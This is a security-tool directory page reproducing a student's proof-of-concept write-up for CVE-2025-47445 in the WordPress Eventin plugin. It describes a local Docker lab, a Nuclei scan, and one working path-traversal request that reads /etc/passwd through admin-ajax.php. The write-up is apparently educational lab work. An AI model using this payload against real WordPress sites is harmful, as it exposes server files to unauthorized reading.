Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-47445-PoC — Proof of Concept for CVE-2025-47445 | Kitploit
Tools/GitHubGitHub/inverterad/cve-2025-47445-poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubinverterad/cve-2025-47445-poc

CVE-2025-47445-PoC

Proof of Concept for CVE-2025-47445

View Repository
6 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-47445 PoC

This proof of concept is based on a school assignment where we wanted to find a vulnerable wordpress plugin and test said vulnerability in a local controlled environment.

Info
Wordpress plugin:Wordpress Eventin
Plugin version:4.0.26 (or older)
CVE information:Project Discovery - Vulnerability library
CVEdetails.com
Tools of interest:Wordfence Lab Environment
Docker
Burp Suite
Nuclei

Setting up the environment

Worfence Docker WordPress Research Lab comes with two different environments, one with an older PHP version, we will opt for the newer one.

root@kitploit:~
# In the dockerwp84 folder
docker-compose build
docker-compose up -d

After this I set up the Wordpress page through localhost:1337. I download the Eventin plugin, specifically version 4.0.26 from the plugin store and install and activate it through the Wordpress interface.

Now everything should be good to go.

DAST / Nuclei

I want to see if Nuclei can find the CVE I am looking for, so I run an instance through a temporary docker container.

root@kitploit:~
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337

I've tried running Nuclei several times and got different results, not sure why. But eventually it finds the CVE, and a couple of other things I was not specifically searching for.

Nuclei screenshot

Burp / Manual test

To see if I can access the /etc/passwd-file I just enter the following payload into my GET request.

root@kitploit:~
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd

And it was a success.

Burp screenshot

Conclusions

This was done for educational purposes.

Make sure you update all your software. New CVEs are found every day.

Download Tool